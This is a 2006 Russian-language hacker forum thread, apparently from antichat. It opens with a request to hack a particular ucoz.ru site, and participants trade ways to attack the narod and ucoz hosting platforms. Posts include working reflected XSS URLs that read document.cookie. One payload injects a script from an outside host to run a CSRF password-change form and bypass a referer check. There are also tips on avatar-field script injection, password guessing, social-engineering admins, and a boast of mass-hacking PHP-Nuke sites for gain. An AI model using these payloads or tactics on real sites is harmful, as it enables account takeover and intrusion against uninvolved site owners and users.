Просмотр полной версии : Взлом h1-h17.ru,narod.ru,ucoz.ru
Вобщем сабж.
Скажите какае есть уязвимости у этих сайтов.
P.S:Хочу вломать сайт ***.ucoz.ru
на народе =)
http://narod.yandex.ru/100.xhtml?<script>alert(document.cookie)</script>
+ там еще в гослевой xss была
Constantine
13.12.2006, 23:29
А на Ucoz'e, насколько я знаю, ничего интересного сейчас нет
Robin_Hood
13.12.2006, 23:45
Hot - с полгода назад там в гостевой, в тексте,
хсс была ща не знаю
сейчас там можно восстановить пароль любого пользователя, но не админа и модера
Ucoz
1) многочисленные перменные профайла в GET
2) попытка реализовать автоформу обламалась, так как рефере проверяеться.
Однако иожно использовать другой модуль.
К примеру поднятия прав до администрирования у определённого пользователя - сделать на это автоформу...или там автоформа на что нить...ещё
На самом деле автоформы и по сей день очень актуальны...даже там где есть защита, просто смотреть надо шире именно в open sources.
3)Помоймууязвимость загрузки в качестве аватара png файла со скриптом (класс пассивная XSS).
.....
уверен куча там ещё всего
1) многочисленные перменные профайла в GET
абсолютная глупость, ничего из того, что нельзя узнать на странице профиля в гете не передается, куки закодированы, в гете только айди пользователя или юкзернейм передается.
2) попытка реализовать автоформу обламалась, так как рефере проверяеться.
судя по первому пункту, не удивительно что ОБЛАМАЛАСЬ....
К примеру поднятия прав до администрирования у определённого пользователя может стоит проверить самому для начала, можно ли админа получить через автоформу, а потом советовать.... админа назначить через сайт нельзя!
просто смотреть надо шире именно в open sources. наверное очень широко ты зришь, даже нашел где-то исходник укоза...... да ты крутой парень... может исходники гугла подкинешь?
3)Помоймууязвимость загрузки в качестве аватара png файла со скриптом (класс пассивная XSS). по твоему это могло сработать только на допотопных браузерах.... хотя из того что ты пишешь видно, что все твои познания очень устарели...
уверен куча там ещё всего если вся остальная куча в которой ты так уверен такое же "Г", то оставь ее при себе, теплее будет.
на укозе можно только юных простаков ломать, которые не могут нормальный пароль поставить и за 10 попыток их пароль подбирается.... или путем взлома почты и подбора секретного вопроса, но это может получиться если жертву знаешь, так как часто фамилию матери вводят или типа того....
__XT__, www.woweb.ru - взломай этот сайт, на укозе тоже кстати находится, раз такой великий хацкер.
может исходники гугла подкинешь?
Архив с клоном скинуть? :D
Вот тебе сайты , которые расположены на одном серваке в месте с ucoz.ru/ ломай их , а потом ломай его!
1. 4tex.info
2. ajsberg.net
3. azamatus.net
4. allportal.net
5. about-myproxy.info
6. autofobus.info
7. billiardclub.info
8. chatica.info
9. club-nn.com
10. djuzer.com
11. elfox.net
12. fuck88.net
13. fotokuban.info
14. gimena-accardi.com
15. global-intruders.info
16. goodzarabotok.info
17. griffi.org
18. introid.com
19. ivanstroy.info
20. koteiki.net
21. keywater.info
22. mosobl.com
23. molagro.com
24. malahovka.net
25. nerr.info
26. neto-best.info
27. nnmsoft.info
28. ofsajt.com
29. orenjob.info
30. poceluy.info
31. p0.ru
32. pspandsmarts.net
33. photo-kmw.com
34. progress-motors.com
35. punkdiy.com
36. pingvinof.net
37. rugames.net
38. restweb.info
39. shoplux.net
40. satpilot.com
41. shtirlic.com
42. shaderworld.net
43. tepliystan.info
44. uhendus-kristuses.com
45. unitedrats.com
46. ussrteam.com
47. vatanweb.net
48. vozrojdenie.info
49. vedrussa.com
50. wlancer.net
51. warteens.com
52. winsmart24.com
53. xtazik.net
54. yrokov.net
55. zdravo.info
GreenBear
15.12.2006, 00:40
Jah, наркоман?) Эти домены просто прикручены - движок там юкоза)
3dn
Чё за ламос очередной=)))
Если сказал, что уязвимость в профайле именно в GET значит так и есть.
Давай я продемонстрирую XSS урле...и ты признаешь что ты ламо!-))))
бггггггггг
3)Помоймууязвимость загрузки в качестве аватара png файла со скриптом (класс пассивная XSS).
"по твоему это могло сработать только на допотопных браузерах.... хотя из того что ты пишешь видно, что все твои познания очень устарели..."
Internet Explorer <=7.0 допотопные браузеры да?
бггг посмеялся спасибо.
читай ламос: http://kodsweb.ru/texts/ie_graphics_xss.txt
и ещё нечего для тебя я взламывать не собираюсь и не потому, что ты ламос а потому что все Белошляпники рулят...всем вайт-хэдам респект!
Давай я продемонстрирую XSS урле...и ты признаешь что ты ламо!-))))
давай если ты продемонстрируешь XSS, который куки выдергивает внедренный в сайт на укозе. Внедрить XSS нужно через дыру в системе юкоз, а не из-за дыры в голове какого-нить пользователя в системе, который позволит простым пользователям добавлять новсти с включенным HTML, то я признаю себя всем кем ты захочешь... А если у тебя ума хватает только на то, чтобы в простом URL еще и скрит прописать, то этим только ламаки могут хвастать.... Внедрить такой урл в сайт нужно, а не уметь его составлять....
Internet Explorer <=7.0 допотопные браузеры да? мало того что ты не сможешь, из-за ограниченности своего ума внедрить в бинарный файл яваскрипт, так ты еще и берешься утверждать что эта дыра работает в современных браузерах.... и даже в 7 версии ИЕ.... похоже твои мозги слабо осознают всю проблему подобной дыры и если бы она была, а она действительно была года 3 назад, то людям работающим с троянами жизнь малиной бы показалась....
и ещё нечего для тебя я взламывать не собираюсь и не потому, что ты ламос а потому что все Белошляпники рулят...всем вайт-хэдам респект!
слова лузера, который может только языком трепать..... у тебя мозгов не хватит чтобы сайт на юкозе взломать, где так много дыр, по твоим словам.....
Вот тебе сайты , которые расположены на одном серваке в месте с ucoz.ru/ ломай их , а потом ломай его!
да ты хохмач..... надо же такой умный, ломай говорит... :) это все сайты в системе юкоз, а если бы поумнее немного был, то смог бы подумать, что сервер не 1 и айпи у юкоза не один, а значит и доменов бы больше нашел.
p0.ru - а это вообще один из доменов укоза, также как и clan.su, my1.ru и т.д.
смотрю тут из советчиков одни детки сидят, которые не способны даже на главную страницу укоза зайти и посмотреть на сайты в колонке слева и текст почитать, чтобы понять что такое укоз.... но советы по взлому давать горазды.
вам только сайты на народе ломать и пхп нюку по уже известным дырам.
HOT, хочешь взломать, разводи админа сайта на пароль хитростями.... совет по взлому самой системы ты тут на найдешь, не тот уровень здешних хацкеров, чтобы предложить что-то достойное, они даже с укозом не знакомы.... а как можно взломать то, в чем не разбираешься???
давай если ты продемонстрируешь XSS, который куки выдергивает внедренный в сайт на укозе. Внедрить XSS нужно через дыру в системе юкоз, а не из-за дыры в голове какого-нить пользователя в системе, который позволит простым пользователям добавлять новсти с включенным HTML, то я признаю себя всем кем ты захочешь... А если у тебя ума хватает только на то, чтобы в простом URL еще и скрит прописать, то этим только ламаки могут хвастать.... Внедрить такой урл в сайт нужно, а не уметь его составлять....
Итак устал веселиться=))))
давай объективно:
что ты хочешь, чтобы я нашёл активную XSS на юкозе?
может как нить займусь, может найду а может и нет.
"XSS нужно через дыру в системе юкоз, а не из-за дыры в голове какого-нить пользователя в системе, который позволит простым пользователям добавлять новсти с включенным HTML, то я признаю себя всем кем ты захочешь"
Извини парень давай без оскарблений но ты рельно не понимаешь вообще о чём я.
Я не писал про добавления скриптов с помощью разрешённых html.
Выше я писал про автоформы...ты в курсе, что это?
если нет спроси у кого нить.
мало того что ты не сможешь, из-за ограниченности своего ума внедрить в бинарный файл яваскрипт, так ты еще и берешься утверждать что эта дыра работает в современных браузерах.... и даже в 7 версии ИЕ.... похоже твои мозги слабо осознают всю проблему подобной дыры и если бы она была, а она действительно была года 3 назад, то людям работающим с троянами жизнь малиной бы показалась....
Почему не могу...я имел ввиду про уязвимость класса Пассивиная Xss для браузера IE методом обхода граффического фильтра.
Дырка это работает как простая пассивная XSS для браузеров IE.
Проверенно на разных web приложениях.
Лучше почитай тут, уже писал:
http://forum.antichat.ru/threadedpost222134.html#post222134
"людям работающим с троянами жизнь малиной бы показалась"
а это к чему?
или ты опять меня не понял или ты вообще не в теме
слова лузера, который может только языком трепать..... у тебя мозгов не хватит чтобы сайт на юкозе взломать, где так много дыр, по твоим словам.....
Ну ё моё чё ты меня оскарбляешь?
ты меня не знаешь и я тебя незнаю,
приёму любую объективную критику, но не надо по киддисовски общаться я так не привык.
я просто уверен в сырости юкоза.
Если потестить оч. хорошо то найти можно много, наверняка.
Вмес то того, чтобы непонимать о чём я пишу и поносить меня сам бы протестил юкоз=)
__XT__, оказывается слова "Чё за ламос очередной=)))" это не оскорбление.... ну тогда мои слова в твой адрес тоже нельзя считать оскорблениями.
Я не писал про добавления скриптов с помощью разрешённых html.
Выше я писал про автоформы...ты в курсе, что это?
я комментировал все что ты писал и четко отвечал по каждому пункту, поэтому не нужно говорить что ты писал, а что не писал.... Про автоформы я тоже тебе ответил.... если ты этого не заметил, то прошу перечитай мои предыдущие посты. Мало того что на укозе все значимые посты и геты передаются с сессией, а значит автоформу сделать не так уж просто, так еще и через сайт админа назначить невозможно, только через панель, а для нее автоформы вообще не работают.
ты меня не знаешь и я тебя незнаю о том что ты даже понятия не имеешь кто я такой нужно было перед своими высказываниями и оскорблениями подумать....
я просто уверен в сырости юкоза. Если потестить оч. хорошо то найти можно много, наверняка.
так вот для начала потестить нужно, а потом заявлять о сырости....
приёму любую объективную критику,
как же ты про объективность можешь говорить если все твои заявления и оскорбления далеки от объективности....
Вмес то того, чтобы непонимать о чём я пишу и поносить меня сам бы протестил юкоз=)
на все твои замечания и утверждения я дал четкие ответы и объяснил почему ни один из твоих способов взлома сайта на юкозе не сработает, нужно внимательнее читать то, что я пишу.... а не зная юкоз как бы я делал эти комментарии?
в отличае от тебя я не делаю голословных заявлений типа что юкоз дырявый или сырой... я говорю как есть и аргументирую почему это именно так....
я заявляю, что взломать юкоз и получить пароль от сайта на юкозе у тебя не выйдет не важно как бы досконально ты его не копал....
"__xt__, оказывается слова "Чё за ламос очередной=)))" это не оскорбление.... ну тогда мои слова в твой адрес тоже нельзя считать оскорблениями."
ПОсматори, я тебе не чего не писал..ты первый отпостил мне с оскарблеиями на что я ответил.
о том что ты даже понятия не имеешь кто я такой нужно было перед своими высказываниями и оскорблениями подумать....
А что мне думмать.Кто ты такой?
Странно когда я знакомился с организатором
хак-сцены Хаоса
он мне такого не говорил...товарищ не держал марку великого хакера=-))))
(Аггр если увидишь не смеяться=) )
так вот для начала потестить нужно, а потом заявлять о сырости....
а почему не заявить? или на античате только по факту уязви мости пишут...тут в первую очередь идёт обсуждения те х или иных пролблем..даже преждевременно=)
как же ты про объективность можешь говорить если все твои заявления и оскорбления далеки от объективности....
1)я тебя первый не оскорблял.
2)заявления старался писать объективно
я заявляю, что взломать юкоз и получить пароль от сайта на юкозе у тебя не выйдет не важно как бы досконально ты его не копал....
Почему не выдет?
ты так уверен в моём ламеризме=?
ну если тебе легче будет я ламос-)
я просто прикалываюсь что я хакер любительского уровня=)))
на все твои замечания и утверждения я дал четкие ответы и объяснил почему ни один из твоих способов взлома сайта на юкозе не сработает, нужно внимательнее читать то, что я пишу.... а не зная юкоз как бы я делал эти комментарии?
Ну видать плохо знаешь.
автоформы там реально сделать.
Xss там хватает.
пхп-инъекций я дум маю найти там не реально=_)
в отличае от тебя я не делаю голословных заявлений типа что юкоз дырявый или сырой... я говорю как есть и аргументирую почему это именно так....
Знаешь честно сказат ьвыражения тупое-=)
ты уверен что Юкоз защищённый?
А я заранее уверен, что он дырявый и ещё какой...докажи мне что он защищённый и докажу что он дырявый=)
Как говорил Декан кафедры Информационной Безопасноти Питерского ПОлитеха
"Безопасность - это процесс..."
...лан парень ты вмето того, чтобы отписывать мне наборы слов, лучшеб показал мне чё нить интересное на юкозе какие нить уязвимости=)))
перед сном глянул юкоз чуток...на пассивные уязвимости.
По поводу активной XSS:
плохая фильтрация
в профайле в поле ссылки на аватуру.
Можно выполнить експлутировать скрипт
javascript: анти-киддис-бгг
vbscript: анти-киддис-бгг
(кстати неплохая активка получилась...
везде где светим аватар везде XSS)
по поводу пассивных их там оч. много.
Ну вот одна просто самая близкая, роли она практически не играет однако как пример,
что XSS там есть сойдёт=)
http://mirinet.narod.ru/ucoz_passiv.html
По поводу создания автоформ для смены пароля или е-майла, проанализировав ситуацию, что вся защита от автоформ строить в проверке реферера.
Понял, что можно експлуатировать наиболее удачную пассивную XSS
и составить запрос типа "><script src=http://mirinet.narod.ru/qwe.js></script>
где в qwe.js будет закодированная автоформа так мы обойдём единственную защиту проверку реферера.
т.к. запрос будет от юкоза=)
По поводу уязвимостей более серьёзных:
было пару подозрений на sql-inj.
всем приятных снов и пока!
А я заранее уверен, что он дырявый и ещё какой...докажи мне что он защищённый и докажу что он дырявый=) факт не нужно доказывать, если взломаешь, то факты будут у тебя, а пока система не взломана, то фактами располагаю я.
в профайле в поле ссылки на аватуру.
Можно выполнить експлутировать скрипт
javascript: анти-киддис-бгг
vbscript: анти-киддис-бгг
дай ка ссылку где ты в аватару на юкозе смог XSS засунуть. а то говорить ты горазд, это очень заментно.
по поводу пассивных их там оч. много. очень много от тебя никто не просит, покажи ОДНУ.
По поводу создания автоформ для смены пароля или е-майла, проанализировав ситуацию, что вся защита от автоформ строить в проверке реферера. ты даже не знаешь что пароль и мыло меняются при редактировании профиля.... если бы знал то так бы и сказал, а не разделял эти два понятия. Так вот, мало того что там реферер проверяется, там еще и айди сессии проверяется, а это значит что твоя автоформа не сработает....
Понял, что можно експлуатировать наиболее удачную пассивную XSS
и составить запрос типа "><script src=http://mirinet.narod.ru/qwe.js></script>
где в qwe.js будет закодированная автоформа так мы обойдём единственную защиту проверку реферера.
т.к. запрос будет от юкоза=) ты вообще разбираешься в веб=технологиях или пишешь то что сам можешь придумать? подменить реферер можно только сервер сайд скриптом, которым весь запрос формируешь.... а если подключать яваскрипт или что угодно еще, реферер браузер сам формирует, и значит подделать его не выйдет.
По поводу уязвимостей более серьёзных:
было пару подозрений на sql-inj. чудо, ты хоть понимаешь что, для того чтобы делать SQL инъекции нужно знать структуру базы, название полей и т.д., а для этого нужно исходники изучать....
Твой каждый пост только показывает всю твою малограмотность в веб-технологиях.
Пока ты не продемонстрируешь хоть 1 рабочую дыру на юкозе, будь то XSS через png или аватар или BBкод или что-то еще, или сможешь соорудить рабочую автоформу ты будешь оставаться просто лаптем, который ничего кроме как ляпать не умеет....
Пойми, за нашим разговором следят и другие люди, и они прекрасно видят кто есть кто... так что можешь писать что тебе смешно читать мои сообщения, другие то смеются над тобой...... столько слов про уязвимости юкоза и нулевой результат.
факт не нужно доказывать, если взломаешь, то факты будут у тебя, а пока система не взломана, то фактами располагаю я.
=)))) ой блин сколькож тут киди-_)__)))))
А кто сказал, что Ucoz CMS не кто не ломал?
если ты не знаешь, то незначит, что его не ломали.
Повторю, докажи, что данная CMS неуязвима и я докажу тебе, что она уязвима=)))
Цитата:
в профайле в поле ссылки на аватуру.
Можно выполнить експлутировать скрипт
javascript: анти-киддис-бгг
vbscript: анти-киддис-бгг
дайка ссылку где ты в аватару на юкозе смог XSS засунуть. а то говорить ты горазд, это очень заментно.
В профайле видишь "Аватар (www адрес):"
Дальше не спрашивай, что к чему...т.к. активную XSS показал, кое кто поймёт как обхадить фильтрацию нужных символов а киддисам и знать не надо.
очень много от тебя никто не просит, покажи ОДНУ.
Ну ты чё мой пост не видел, посматри выше где я привёл пассивную XSS на Юкозе.
Через автоформу Постом ударяем по пасивке=)))
http://mirinet.narod.ru/ucoz_passiv.html
ты даже не знаешь что пароль и мыло меняются при редактировании профиля.... если бы знал то так бы и сказал, а не разделял эти два понятия. Так вот, мало того что там реферер проверяется, там еще и айди сессии проверяется, а это значит что твоя автоформа не сработает....
ой блин.....всё немогу
просто дикая чушь.
ты понимаешь вообще суть автоформ?
даёшь жертве линк на страничку на которой постом отправляеться запрос на смену пароля или ещё чего нить.
Ну дак вот
посматри в форме профайла какие перменные?
где ты там айди сессии увидел?
Даже если сессию проверяют ...уязвимость не теряеться...т.к. жертва сама не зная того меняет у себя пароль (при условии что она авторизирована)
вот меня пока блокирнуло то, что система проверяет реферер..при запуске автоформы сайт мне вернул:
"You are trying to do illegal action!"
ты вообще разбираешься в веб=технологиях или пишешь то что сам можешь придумать? подменить реферер можно только сервер сайд скриптом, которым весь запрос формируешь.... а если подключать яваскрипт или что угодно еще, реферер браузер сам формирует, и значит подделать его не выйдет.
нет я просто люблю выдуммывать=)
чудо, ты хоть понимаешь что, для того чтобы делать SQL инъекции нужно знать структуру базы, название полей и т.д., а для этого нужно исходники изучать....
Твой каждый пост только показывает всю твою малограмотность в веб-технологиях.
Пока ты не продемонстрируешь хоть 1 рабочую дыру на юкозе, будь то XSS через png или аватар или BBкод или что-то еще, или сможешь соорудить рабочую автоформу ты будешь оставаться просто лаптем, который ничего кроме как ляпать не умеет....
Пойми, за нашим разговором следят и другие люди, и они прекрасно видят кто есть кто... так что можешь писать что тебе смешно читать мои сообщения, другие то смеются над тобой...... столько слов про уязвимости юкоза и нулевой результат.
=0))) супер!
===
Слушай меня терзают мутные сомнения=)))
ты случаем не один из моих знакомых, который решил поприкалываться на домной?
если так то ты реально меня достал...респект=)
Если нет - Давай закроем нашу дисскусию, т.к. народу неинтересны наши тупые припинания, он и так сделал выводы...если хочешь я соглашусь что ты прав а я ламер=) стучи 243122140 пообщаемся
пла сериал нах снять моно о_0
3dn ты случаем не сотрудник юсоса???о_0
...иль для фрикол ником выпрал их томен?о_0
Draugdur
19.12.2006, 23:38
3dn либо реально один из их кодеров,который считает,что его система совершенна или лопух,котрый хочет узнать баги юкоза или параноик какой-то,но если честно ведёт себя не очень адекватно и даже агрессивно. Чувак,релакс =)
или лопух,котрый хочет узнать баги юкоза
вот вот.... но никто мне этих багов не может показать....
Dmitriy507
20.12.2006, 03:30
а с джином как?
кодер лопух который ищет баги чтоб их закрыть? о_0
ЗЫ.про юкоз кажись писали что не фильтрует знак @ о_0
А я знаю sql-инъекцию на укозе на главном сайте...
А я знаю sql-инъекцию на укозе на главном сайте...
круто, тогда ты можешь их нехило поиметь....
ЗЫ.про юкоз кажись писали что не фильтрует знак @ о_0
кому нужны твои "кажись"? значешь - говори, не знаешь - молчи!
InferNo23
20.12.2006, 18:59
3dn вот xss на главном сайте 6
http://www.ucoz.ru/main/?a=checkdom;login=%22%3E%3Cscript%3Ealert(document .cookie)%3C/script%3E
~Real F@ck!~
20.12.2006, 19:09
на народе =)
http://narod.yandex.ru/100.xhtml?<script>alert(document.cookie)</script>
+ там еще в гослевой xss была
Спасиб. Незнал про это.
3dn цуко командир нашелся оффтопер нах
http://www.ucoz.ru/main/?a=checkdom;login=%22%3E%3Cscript%3Ealert(document .cookie)%3C/script%3E
жаль что с ее помощью ничего не получишь полезного... хотя XSS на лицо, минус в сторону укоза...
3dn цуко командир нашелся оффтопер нах
ты лузер, который ничего по теме сказать не может, только оффтопить ума хватает....
Dmitriy507
22.12.2006, 03:43
а меня ктонибудь слышал? как на счет джино и by.ru?
а меня ктонибудь слышал? как на счет джино и by.ru?
димон, ты что-то совсем не думаешь.... на джино ставят разные скрипты, там не система управления, как на юкозе.... если хочешь взломать сайт на джино и при этом он используюет какю-то систему управления (скорее всего бесплатную и с кучей дыр), то для начала выясни что за система а потом ищи по информацию по ее дырам. Помнится, мы ломали тысячи сайтов автоматом, которые использовали пхпнюку (в корыстных целях, конечноже, а не для удовольствия).
По поводу бай.ру, то там нельзя скрипты ставить, а значит ломать нечего, разве что весь сервер, но система старая и все дыры уже давно закрыли, да и если ты тут вопросы задаешь, то про взлом сервера тебе даже отдаленно думать не стоит.
Dmitriy507
24.12.2006, 05:34
понятно.
Почему это не стоит?!
Termin@L
01.01.2007, 19:47
http://www.ucoz.ru/main/?a=checkdom;login=%22%3E%3Cscript%3Ealert(document .cookie)%3C/script%3E - дыру по ходу дела уже залатали, там видно htmlspecialchar() поставили на эту переменную, поэтому тэги не вставитить...
по ходу дела уже залатали
Xss на юкоз вообще бестолковое занятие, кража кука ничего не даст, так как воспользоватся им не получится, там привязка к айпи и не только... а приведенный выше пример Xss лишь показал, что на юкозе все же можно найти возможность сделать какую-нибудь Xssку... но толку от таких Xss нет.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot